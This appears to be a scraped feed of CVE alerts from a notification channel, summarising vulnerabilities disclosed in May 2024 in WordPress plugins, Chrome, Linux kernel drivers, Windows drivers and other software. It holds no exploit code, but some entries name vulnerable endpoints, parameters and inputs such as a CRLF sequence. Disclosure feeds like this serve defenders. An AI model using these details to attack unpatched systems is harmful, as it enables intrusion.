🚨 CVE-2024-1855The WPCafe – Restaurant Menu, Online Ordering for WooCommerce, Pickup / Delivery and Table Reservation plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.2.23 via the wpc_check_for_submission function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application.🎖@cveNotify |
|
| 2024-05-23 02:37:24 |
🚨 CVE-2023-6844The iframe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to and including 5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-23 01:37:24 |
🚨 CVE-2024-3708A condition exists in lighttpd version prior to 1.4.51 whereby a remote attacker can craft an http request which could result in multiple outcomes:1.) cause lighttpd to access freed memory in which case the process lighttpd is running in could be terminated or other non-deterministic behavior could result2.) a memory information disclosure event could result which could be used to determine the state of memory which could then be used to theoretically bypass ALSR protectionsThis CVE will be updated with more details on July 9th, 2024 after affected parties have had time to remediate.🎖@cveNotify |
|
| 2024-05-22 23:37:30 |
🚨 CVE-2024-29852Veeam Backup Enterprise Manager allows high-privileged users to read backup session logs.🎖@cveNotify |
|
| 2024-05-22 23:37:29 |
🚨 CVE-2024-29851Veeam Backup Enterprise Manager allows high-privileged users to steal NTLM hash of Enterprise manager service account.🎖@cveNotify |
|
| 2024-05-22 23:37:26 |
🚨 CVE-2024-29850Veeam Backup Enterprise Manager allows account takeover via NTLM relay.🎖@cveNotify |
|
| 2024-05-22 23:37:25 |
🚨 CVE-2023-46807An SQL Injection vulnerability in web component of EPMM before 12.1.0.0 allows an authenticated user with appropriate privilege to access or modify data in the underlying database.🎖@cveNotify |
|
| 2024-05-22 23:37:24 |
🚨 CVE-2023-46806An SQL Injection vulnerability in a web component of EPMM versions before 12.1.0.0 allows an authenticated user with appropriate privilege to access or modify data in the underlying database.🎖@cveNotify |
|
| 2024-05-22 22:37:25 |
🚨 CVE-2023-6725An access-control flaw was found in the OpenStack Designate component where private configuration information including access keys to BIND were improperly made world readable. A malicious attacker with access to any container could exploit this flaw to access sensitive information.🎖@cveNotify |
|
| 2024-05-22 22:37:24 |
🚨 CVE-2024-1141A vulnerability was found in python-glance-store. The issue occurs when the package logs the access_key for the glance-store when the DEBUG log level is enabled.🎖@cveNotify |
|
| 2024-05-22 21:37:24 |
🚨 CVE-2024-35204Veritas System Recovery before 23.2_Hotfix has incorrect permissions for the Veritas System Recovery folder, and thus low-privileged users can conduct attacks.🎖@cveNotify |
|
| 2024-05-22 20:37:31 |
🚨 CVE-2024-4453GStreamer EXIF Metadata Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of EXIF metadata. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.. Was ZDI-CAN-23896.🎖@cveNotify |
|
| 2024-05-22 20:37:30 |
🚨 CVE-2024-4267A remote code execution (RCE) vulnerability exists in the parisneo/lollms-webui, specifically within the 'open_file' module, version 9.5. The vulnerability arises due to improper neutralization of special elements used in a command within the 'open_file' function. An attacker can exploit this vulnerability by crafting a malicious file path that, when processed by the 'open_file' function, executes arbitrary system commands or reads sensitive file content. This issue is present in the code where subprocess.Popen is used unsafely to open files based on user-supplied paths without adequate validation, leading to potential command injection.🎖@cveNotify |
|
| 2024-05-22 20:37:26 |
🚨 CVE-2024-31894IBM App Connect Enterprise 12.0.1.0 through 12.0.12.1 could allow an authenticated user to obtain sensitive user information using an expired access token. IBM X-Force ID: 288175.🎖@cveNotify |
|
| 2024-05-22 20:37:25 |
🚨 CVE-2023-51637Sante PACS Server PG Patient Query SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sante PACS Server PG. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the DICOM service, which listens on TCP port 11122 by default. When parsing the NAME element of the PATIENT record, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of NETWORK SERVICE. Was ZDI-CAN-21579.🎖@cveNotify |
|
| 2024-05-22 20:37:24 |
🚨 CVE-2023-51636Avira Prime Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Avira Prime. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the Avira Spotlight Service. By creating a symbolic link, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-21600.🎖@cveNotify |
|
| 2024-05-22 19:37:30 |
🚨 CVE-2024-35627tileserver-gl up to v4.4.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /data/v3/?key.🎖@cveNotify |
|
| 2024-05-22 19:37:26 |
🚨 CVE-2024-31893IBM App Connect Enterprise 12.0.1.0 through 12.0.12.1 could allow an authenticated user to obtain sensitive calendar information using an expired access token. IBM X-Force ID: 288174.🎖@cveNotify |
|
| 2024-05-22 19:37:25 |
🚨 CVE-2024-25737A Server-Side Request Forgery (SSRF) vulnerability in the /Cover/Show route (showAction in CoverController.php) in Open Library Foundation VuFind 2.4 through 9.1 before 9.1.1 allows remote attackers to access internal HTTP servers and perform Cross-Site Scripting (XSS) attacks by proxying arbitrary URLs via the proxy GET parameter.🎖@cveNotify |
|
| 2024-05-22 19:37:24 |
🚨 CVE-2024-35475A Cross-Site Request Forgery (CSRF) vulnerability was discovered in OpenKM Community Edition on or before version 6.3.12. The vulnerability exists in /admin/DatabaseQuery, which allows an attacker to manipulate a victim with administrative privileges to execute arbitrary SQL commands.🎖@cveNotify |
|
| 2024-05-22 19:07:43 |
🚨 CVE-2024-5160Heap buffer overflow in Dawn in Google Chrome prior to 125.0.6422.76 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-22 19:07:42 |
🚨 CVE-2024-5158Type Confusion in V8 in Google Chrome prior to 125.0.6422.76 allowed a remote attacker to potentially perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-22 19:07:41 |
🚨 CVE-2024-5157Use after free in Scheduling in Google Chrome prior to 125.0.6422.76 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-22 19:07:37 |
🚨 CVE-2024-34448Ghost before 5.82.0 allows CSV Injection during a member CSV export.🎖@cveNotify |
|
| 2024-05-22 19:07:36 |
🚨 CVE-2024-33226An issue in the component Access64.sys of Wistron Corporation TBT Force Power Control v1.0.0.0 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 19:07:32 |
🚨 CVE-2024-33225An issue in the component RTKVHD64.sys of Realtek Semiconductor Corp Realtek(r) High Definition Audio Function Driver v6.0.9549.1 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 19:07:31 |
🚨 CVE-2024-33223An issue in the component IOMap64.sys of ASUSTeK Computer Inc ASUS GPU TweakII v1.4.5.2 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 19:07:30 |
🚨 CVE-2024-29392Silverpeas Core 6.3 is vulnerable to Cross Site Scripting (XSS) via ClipboardSessionController.🎖@cveNotify |
|
| 2024-05-22 19:07:26 |
🚨 CVE-2024-33221An issue in the component AsusBSItf.sys of ASUSTeK Computer Inc ASUS BIOS Flash Driver v3.2.12.0 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 19:07:25 |
🚨 CVE-2024-33219An issue in the component AsIO64.sys of ASUSTeK Computer Inc ASUS SABERTOOTH X99 Driver v1.0.1.0 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 19:07:24 |
🚨 CVE-2024-33218An issue in the component AsUpIO64.sys of ASUSTeK Computer Inc ASUS USB 3.0 Boost Storage Driver 5.30.20.0 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 17:37:43 |
🚨 CVE-2023-5088A bug in QEMU could cause a guest I/O operation otherwise addressed to an arbitrary disk offset to be targeted to offset 0 instead (potentially overwriting the VM's boot code). This could be used, for example, by L2 guests with a virtual disk (vdiskL2) stored on a virtual disk of an L1 (vdiskL1) hypervisor to read and/or write data to LBA 0 of vdiskL1, potentially gaining control of L1 at its next reboot.🎖@cveNotify |
|
| 2024-05-22 17:37:42 |
🚨 CVE-2023-5367A out-of-bounds write flaw was found in the xorg-x11-server. This issue occurs due to an incorrect calculation of a buffer offset when copying data stored in the heap in the XIChangeDeviceProperty function in Xi/xiproperty.c and in RRChangeOutputProperty function in randr/rrproperty.c, allowing for possible escalation of privileges or denial of service.🎖@cveNotify |
|
| 2024-05-22 17:37:41 |
🚨 CVE-2023-4693An out-of-bounds read flaw was found on grub2's NTFS filesystem driver. This issue may allow a physically present attacker to present a specially crafted NTFS file system image to read arbitrary memory locations. A successful attack allows sensitive data cached in memory or EFI variable values to be leaked, presenting a high Confidentiality risk.🎖@cveNotify |
|
| 2024-05-22 17:37:37 |
🚨 CVE-2023-43788A vulnerability was found in libXpm due to a boundary condition within the XpmCreateXpmImageFromBuffer() function. This flaw allows a local attacker to trigger an out-of-bounds read error and read the contents of memory on the system.🎖@cveNotify |
|
| 2024-05-22 17:37:36 |
🚨 CVE-2023-43786A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.🎖@cveNotify |
|
| 2024-05-22 17:37:32 |
🚨 CVE-2023-43785A vulnerability was found in libX11 due to a boundary condition within the _XkbReadKeySyms() function. This flaw allows a local user to trigger an out-of-bounds read error and read the contents of memory on the system.🎖@cveNotify |
|
| 2024-05-22 17:37:31 |
🚨 CVE-2023-39192A flaw was found in the Netfilter subsystem in the Linux kernel. The xt_u32 module did not validate the fields in the xt_u32 structure. This flaw allows a local privileged attacker to trigger an out-of-bounds read by setting the size fields with a value beyond the array boundaries, leading to a crash or information disclosure.🎖@cveNotify |
|
| 2024-05-22 17:37:30 |
🚨 CVE-2023-39189A flaw was found in the Netfilter subsystem in the Linux kernel. The nfnl_osf_add_callback function did not validate the user mode controlled opt_num field. This flaw allows a local privileged (CAP_NET_ADMIN) attacker to trigger an out-of-bounds read, leading to a crash or information disclosure.🎖@cveNotify |
|
| 2024-05-22 17:37:26 |
🚨 CVE-2023-42754A NULL pointer dereference flaw was found in the Linux kernel ipv4 stack. The socket buffer (skb) was assumed to be associated with a device before calling __ip_options_compile, which is not always the case if the skb is re-routed by ipvs. This issue may allow a local user with CAP_NET_ADMIN privileges to crash the system.🎖@cveNotify |
|
| 2024-05-22 17:37:25 |
🚨 CVE-2023-3567A use-after-free flaw was found in vcs_read in drivers/tty/vt/vc_screen.c in vc_screen in the Linux Kernel. This issue may allow an attacker with local user access to cause a system crash or leak internal kernel information.🎖@cveNotify |
|
| 2024-05-22 16:37:42 |
🚨 CVE-2024-5160Heap buffer overflow in Dawn in Google Chrome prior to 125.0.6422.76 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-22 16:37:39 |
🚨 CVE-2024-5159Heap buffer overflow in ANGLE in Google Chrome prior to 125.0.6422.76 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-22 16:37:38 |
🚨 CVE-2024-5157Use after free in Scheduling in Google Chrome prior to 125.0.6422.76 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-22 16:37:37 |
🚨 CVE-2024-34448Ghost before 5.82.0 allows CSV Injection during a member CSV export.🎖@cveNotify |
|
| 2024-05-22 16:37:33 |
🚨 CVE-2024-33228An issue in the component segwindrvx64.sys of Insyde Software Corp SEG Windows Driver v100.00.07.02 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 16:37:32 |
🚨 CVE-2024-33226An issue in the component Access64.sys of Wistron Corporation TBT Force Power Control v1.0.0.0 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 16:37:31 |
🚨 CVE-2024-33225An issue in the component RTKVHD64.sys of Realtek Semiconductor Corp Realtek(r) High Definition Audio Function Driver v6.0.9549.1 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 16:37:30 |
🚨 CVE-2024-33224An issue in the component rtkio64.sys of Realtek Semiconductor Corp Realtek lO Driver v1.008.0823.2017 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 16:37:26 |
🚨 CVE-2024-33222An issue in the component ATSZIO64.sys of ASUSTeK Computer Inc ASUS ATSZIO Driver v0.2.1.7 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 16:37:25 |
🚨 CVE-2024-36050Nix through 2.22.1 mishandles certain usage of hash caches, which makes it easier for attackers to replace current source code with attacker-controlled source code by luring a maintainer into accepting a malicious pull request.🎖@cveNotify |
|
| 2024-05-22 16:37:24 |
🚨 CVE-2024-2912An insecure deserialization vulnerability exists in the BentoML framework, allowing remote code execution (RCE) by sending a specially crafted POST request. By exploiting this vulnerability, attackers can execute arbitrary commands on the server hosting the BentoML application. The vulnerability is triggered when a serialized object, crafted to execute OS commands upon deserialization, is sent to any valid BentoML endpoint. This issue poses a significant security risk, enabling attackers to compromise the server and potentially gain unauthorized access or control.🎖@cveNotify |
|
| 2024-05-22 15:37:36 |
🚨 CVE-2024-3926The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom_attributes value in widgets in all versions up to, and including, 5.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-22 15:37:35 |
🚨 CVE-2024-33219An issue in the component AsIO64.sys of ASUSTeK Computer Inc ASUS SABERTOOTH X99 Driver v1.0.1.0 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 15:37:33 |
🚨 CVE-2024-33218An issue in the component AsUpIO64.sys of ASUSTeK Computer Inc ASUS USB 3.0 Boost Storage Driver 5.30.20.0 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-05-22 14:42:28 |
None |
|
| 2024-05-22 14:37:40 |
🚨 CVE-2024-35560idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/ca_deal.php?mudi=del&dataType=&dataTypeCN.🎖@cveNotify |
|
| 2024-05-22 14:37:39 |
🚨 CVE-2024-35558idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/ca_deal.php?mudi=rev&nohrefStr=close.🎖@cveNotify |
|
| 2024-05-22 14:37:38 |
🚨 CVE-2024-35557idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/vpsApi_deal.php?mudi=rev&nohrefStr=close.🎖@cveNotify |
|
| 2024-05-22 14:37:34 |
🚨 CVE-2024-35556idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/vpsSys_deal.php?mudi=infoSet.🎖@cveNotify |
|
| 2024-05-22 14:37:33 |
🚨 CVE-2024-35554idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/infoWeb_deal.php?mudi=del&dataType=newsWeb&dataTypeCN.🎖@cveNotify |
|
| 2024-05-22 14:37:32 |
🚨 CVE-2024-35552idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/infoMove_deal.php?mudi=del&dataType=logo&dataTypeCN.🎖@cveNotify |
|
| 2024-05-22 14:37:28 |
🚨 CVE-2024-35550idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/infoWeb_deal.php?mudi=rev.🎖@cveNotify |
|
| 2024-05-22 14:37:27 |
🚨 CVE-2024-35475A Cross-Site Request Forgery (CSRF) vulnerability was discovered in OpenKM Community Edition on or before version 6.3.12. The vulnerability exists in /admin/DatabaseQuery, which allows an attacker to manipulate a victim with administrative privileges to execute arbitrary SQL commands.🎖@cveNotify |
|
| 2024-05-22 14:37:26 |
🚨 CVE-2024-4261The Responsive Contact Form Builder & Lead Generation Plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.9.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes.🎖@cveNotify |
|
| 2024-05-22 13:37:53 |
🚨 CVE-2024-4261The Responsive Contact Form Builder & Lead Generation Plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.9.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes.🎖@cveNotify |
|
| 2024-05-22 13:08:18 |
🚨 CVE-2024-5040There are multiple ways in LCDS LAquis SCADA for an attacker to access locations outside of their own directory.🎖@cveNotify |
|
| 2024-05-22 13:08:17 |
🚨 CVE-2024-35220@fastify/session is a session plugin for fastify. Requires the @fastify/cookie plugin. When restoring the cookie from the session store, the `expires` field is overriden if the `maxAge` field was set.This means a cookie is never correctly detected as expired and thus expired sessions are not destroyed. This vulnerability has been patched 10.8.0.🎖@cveNotify |
|
| 2024-05-22 13:08:16 |
🚨 CVE-2024-31756An issue in MarvinTest Solutions Hardware Access Driver v.5.0.3.0 and before and fixed in v.5.0.4.0 allows a local attacker to escalate privileges via the Hw65.sys component.🎖@cveNotify |
|
| 2024-05-22 13:08:15 |
🚨 CVE-2024-35061NASA AIT-Core v2.5.2 was discovered to use unencrypted channels to exchange data over the network, allowing attackers to execute a man-in-the-middle attack.🎖@cveNotify |
|
| 2024-05-22 13:08:12 |
🚨 CVE-2024-35060An issue in the YAML Python library of NASA AIT-Core v2.5.2 allows attackers to execute arbitrary commands via supplying a crafted YAML file.🎖@cveNotify |
|
| 2024-05-22 13:08:11 |
🚨 CVE-2024-33525A Stored Cross-site Scripting (XSS) vulnerability in the "Import of organizational units and title of organizational unit" feature in ILIAS 7.20 to 7.30 and ILIAS 8.4 to 8.10 as well as ILIAS 9.0 allows remote authenticated attackers with administrative privileges to inject arbitrary web script or HTML via XML file upload.🎖@cveNotify |
|
| 2024-05-22 13:08:10 |
🚨 CVE-2024-25724In RTI Connext Professional 5.3.1 through 6.1.0 before 6.1.1, a buffer overflow in XML parsing from Routing Service, Recording Service, Queuing Service, and Cloud Discovery Service allows attackers to execute code with the affected service's privileges, compromise the service's integrity, leak sensitive information, or crash the service. These attacks could be done via a remote malicious RTPS message; a compromised call with malicious parameters to the RTI_RoutingService_new, rti::recording::Service, RTI_QueuingService_new, or RTI_CDS_Service_new public APIs; or a compromised local file system containing a malicious XML file.🎖@cveNotify |
|
| 2024-05-22 13:08:06 |
🚨 CVE-2024-4154In lunary-ai/lunary version 1.2.2, an incorrect synchronization vulnerability allows unprivileged users to rename projects they do not have access to. Specifically, an unprivileged user can send a PATCH request to the project's endpoint with a new name for a project, despite not having the necessary permissions or being assigned to the project. This issue allows for unauthorized modification of project names, potentially leading to confusion or unauthorized access to project resources.🎖@cveNotify |
|
| 2024-05-22 13:08:05 |
🚨 CVE-2024-35057An issue in NASA AIT-Core v2.5.2 allows attackers to execute arbitrary code via a crafted packet.🎖@cveNotify |
|
| 2024-05-22 13:08:04 |
🚨 CVE-2024-35056NASA AIT-Core v2.5.2 was discovered to contain multiple SQL injection vulnerabilities via the query_packets and insert functions.🎖@cveNotify |
|
| 2024-05-22 13:08:02 |
🚨 CVE-2024-34240QDOCS Smart School 7.0.0 is vulnerable to Cross Site Scripting (XSS) resulting in arbitrary code execution in admin functions related to adding or updating records.🎖@cveNotify |
|
| 2024-05-22 13:07:57 |
🚨 CVE-2024-22275The vCenter Server contains a partial file read vulnerability. A malicious actor with administrative privileges on the vCenter appliance shell may exploit this issue to partially read arbitrary files containing sensitive data.🎖@cveNotify |
|
| 2024-05-22 13:07:56 |
🚨 CVE-2024-22273The storage controllers on VMware ESXi, Workstation, and Fusion have out-of-bounds read/write vulnerability. A malicious actor with access to a virtual machine with storage controllers enabled may exploit this issue to create a denial of service condition or execute code on the hypervisor from a virtual machine in conjunction with other issues.🎖@cveNotify |
|
| 2024-05-22 13:07:55 |
🚨 CVE-2024-36052RARLAB WinRAR before 7.00, on Windows, allows attackers to spoof the screen output via ANSI escape sequences, a different issue than CVE-2024-33899.🎖@cveNotify |
|
| 2024-05-22 11:37:25 |
🚨 CVE-2024-5194A vulnerability was found in Arris VAP2500 08.50. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assoc_table.php. The manipulation of the argument id leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265831.🎖@cveNotify |
|
| 2024-05-22 11:37:24 |
🚨 CVE-2024-5193A vulnerability was found in Ritlabs TinyWeb Server 1.94. It has been classified as problematic. Affected is an unknown function of the component Request Handler. The manipulation with the input %0D%0A leads to crlf injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-265830 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-22 10:37:25 |
🚨 CVE-2024-4262The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 2.4.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-22 10:37:24 |
🚨 CVE-2024-4153A vulnerability in lunary-ai/lunary version 1.2.2 allows attackers to bypass user creation limits and potentially evade payment requirements. The issue arises from an undefined behavior when handling input to the API, specifically through a POST request to the /v1/users endpoint. By crafting a request with a new user's email and assigning them an 'admin' role, attackers can invite additional users beyond the set limit. This vulnerability could be exploited to add an unlimited number of users without adhering to the intended restrictions.🎖@cveNotify |
|
| 2024-05-22 09:37:47 |
🚨 CVE-2021-47479In the Linux kernel, the following vulnerability has been resolved:staging: rtl8712: fix use-after-free in rtl8712_dl_fwSyzbot reported use-after-free in rtl8712_dl_fw(). The problem was inrace condition between r871xu_dev_remove() ->ndo_open() callback.It's easy to see from crash log, that driver accesses released firmwarein ->ndo_open() callback. It may happen, since driver was releasingfirmware _before_ unregistering netdev. Fix it by movingunregister_netdev() before cleaning up resources.Call Trace:... rtl871x_open_fw drivers/staging/rtl8712/hal_init.c:83 [inline] rtl8712_dl_fw+0xd95/0xe10 drivers/staging/rtl8712/hal_init.c:170 rtl8712_hal_init drivers/staging/rtl8712/hal_init.c:330 [inline] rtl871x_hal_init+0xae/0x180 drivers/staging/rtl8712/hal_init.c:394 netdev_open+0xe6/0x6c0 drivers/staging/rtl8712/os_intfs.c:380 __dev_open+0x2bc/0x4d0 net/core/dev.c:1484Freed by task 1306:... release_firmware+0x1b/0x30 drivers/base/firmware_loader/main.c:1053 r871xu_dev_remove+0xcc/0x2c0 drivers/staging/rtl8712/usb_intf.c:599 usb_unbind_interface+0x1d8/0x8d0 drivers/usb/core/driver.c:458🎖@cveNotify |
|
| 2024-05-22 09:37:43 |
🚨 CVE-2021-47477In the Linux kernel, the following vulnerability has been resolved:comedi: dt9812: fix DMA buffers on stackUSB transfer buffers are typically mapped for DMA and must not beallocated on the stack or transfers will fail.Allocate proper transfer buffers in the various command helpers andreturn an error on short transfers instead of acting on random stackdata.Note that this also fixes a stack info leak on systems where DMA is notused as 32 bytes are always sent to the device regardless of how shortthe command is.🎖@cveNotify |
|
| 2024-05-22 09:37:42 |
🚨 CVE-2021-47475In the Linux kernel, the following vulnerability has been resolved:comedi: vmk80xx: fix transfer-buffer overflowsThe driver uses endpoint-sized USB transfer buffers but up untilrecently had no sanity checks on the sizes.Commit e1f13c879a7c ("staging: comedi: check validity of wMaxPacketSizeof usb endpoints found") inadvertently fixed NULL-pointer dereferenceswhen accessing the transfer buffers in case a malicious device has azero wMaxPacketSize.Make sure to allocate buffers large enough to handle also the otheraccesses that are done without a size check (e.g. byte 18 invmk80xx_cnt_insn_read() for the VMK8061_MODEL) to avoid writing beyondthe buffers, for example, when doing descriptor fuzzing.The original driver was for a low-speed device with 8-byte buffers.Support was later added for a device that uses bulk transfers and ispresumably a full-speed device with a maximum 64-byte wMaxPacketSize.🎖@cveNotify |
|
| 2024-05-22 09:37:41 |
🚨 CVE-2021-47474In the Linux kernel, the following vulnerability has been resolved:comedi: vmk80xx: fix bulk-buffer overflowThe driver is using endpoint-sized buffers but must not assume that thetx and rx buffers are of equal size or a malicious device could overflowthe slab-allocated receive buffer when doing bulk transfers.🎖@cveNotify |
|
| 2024-05-22 08:37:37 |
🚨 CVE-2024-5147The WPZOOM Addons for Elementor (Templates, Widgets) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.37 via the 'grid_style' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-05-22 08:37:33 |
🚨 CVE-2024-4157The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.1.15 via deserialization of untrusted input in the extractDynamicValues function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. Successful exploitation requires the attacker to have "View Form" and "Manage Form" permissions, which must be explicitly set by an administrator. However, this requirement can be bypassed when this vulnerability is chained with CVE-2024-2771.🎖@cveNotify |
|
| 2024-05-22 08:37:32 |
🚨 CVE-2024-3666The Opal Estate Pro – Property Management and Submission plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the agent latitude and longitude parameters in all versions up to, and including, 1.7.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-22 08:37:31 |
🚨 CVE-2024-2953The LuckyWP Table of Contents plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Contributor permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-22 08:37:27 |
🚨 CVE-2024-2119The LuckyWP Table of Contents plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the attrs parameter in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-22 08:37:26 |
🚨 CVE-2023-6487The LuckyWP Table of Contents plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘Header Title' field in all versions up to and including 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-05-22 08:37:25 |
🚨 CVE-2024-30314Dreamweaver Desktop versions 21.3 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead in arbitrary code execution by an attacker. Exploitation of this issue does require user interaction.🎖@cveNotify |
|
| 2024-05-22 07:37:26 |
🚨 CVE-2021-47436In the Linux kernel, the following vulnerability has been resolved:usb: musb: dsps: Fix the probe error pathCommit 7c75bde329d7 ("usb: musb: musb_dsps: request_irq() afterinitializing musb") has inverted the calls todsps_setup_optional_vbus_irq() and dsps_create_musb_pdev() withoutupdating correctly the error path. dsps_create_musb_pdev() allocates andregisters a new platform device which must be unregistered and freedwith platform_device_unregister(), and this is missing upondsps_setup_optional_vbus_irq() error.While on the master branch it seems not to trigger any issue, I observeda kernel crash because of a NULL pointer dereference with a v5.10.70stable kernel where the patch mentioned above was backported. With thiskernel version, -EPROBE_DEFER is returned the first timedsps_setup_optional_vbus_irq() is called which triggers the probe toerror out without unregistering the platform device. Unfortunately, onthe Beagle Bone Black Wireless, the platform device still living in thesystem is being used by the USB Ethernet gadget driver, which during theboot phase triggers the crash.My limited knowledge of the musb world prevents me to revert this commitwhich was sent to silence a robot warning which, as far as I understand,does not make sense. The goal of this patch was to prevent an IRQ tofire before the platform device being registered. I think this cannotever happen due to the fact that enabling the interrupts is done by the->enable() callback of the platform musb device, and this platformdevice must be already registered in order for the core or any otheruser to use this callback.Hence, I decided to fix the error path, which might prevent futureerrors on mainline kernels while also fixing older 